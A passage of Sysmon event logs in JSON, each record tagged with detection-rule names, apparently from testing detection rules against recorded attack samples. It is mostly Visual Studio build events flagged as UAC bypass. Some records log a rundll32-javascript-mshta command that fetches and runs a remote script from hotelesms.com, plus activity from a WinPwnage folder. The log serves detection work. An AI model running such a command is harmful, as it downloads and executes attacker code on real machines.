\"C:\\Users\\bouss\\source\\repos\\blabla\\blabla.sln\"","ParentImage":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ParentProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ParentProcessId":7664,"ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"Product":"Microsoft® Build Tools®","RuleName":"","TerminalSessionId":5,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2021-01-26 13:21:13.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2429132,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.690036Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.641","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\blabla.lastbuildstate","UtcTime":"2021-01-26 
13:21:13.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429134,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.972503Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429135,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.975523Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - 
File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429136,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.975732Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 
13:21:14.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429140,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.399477Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.394"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429141,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425366Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - 
File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.395"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429142,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425472Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 
13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429143,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425565Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429144,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425664Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on 
MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 13:21:14.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429148,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871509Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 
13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429149,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871745Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429150,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871980Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification 
- File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.854"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429151,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.872190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 
13:21:14.855"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429152,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.872564Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.229","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp","UtcTime":"2021-01-26 13:21:23.229"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429153,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.229964Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using 
.NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.302","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp","UtcTime":"2021-01-26 13:21:23.302"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429154,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.303639Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.305","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp","UtcTime":"2021-01-26 
13:21:23.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429155,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.305903Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:33.196","Image":"C:\\windows\\system32\\mmc.exe","ProcessGuid":"00247C92-EC0A-600F-0000-00100AEFCC2C","ProcessId":22932,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\prebuildevent_visual_studio.evtx","UtcTime":"2021-01-26 13:21:33.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429156,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:33.197967Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta 
https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"\"cmd.exe\" /s /k pushd \"C:\\Users\\IEUser\\Desktop\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4F8A-5CE3-0000-0010C5BB4800","ParentProcessId":3548,"ProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ProcessId":1532,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4125,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ParentProcessId":1532,"ProcessGuid":"365ABB72-1A29-5CE4-0000-00107BE42101","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4126,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-12 
13:30:46.181","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ProcessId":1332,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\ieframe.url","UtcTime":"2019-05-12 13:30:46.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16387,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:30:46.181756Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" ieframe.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\ieframe.url","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 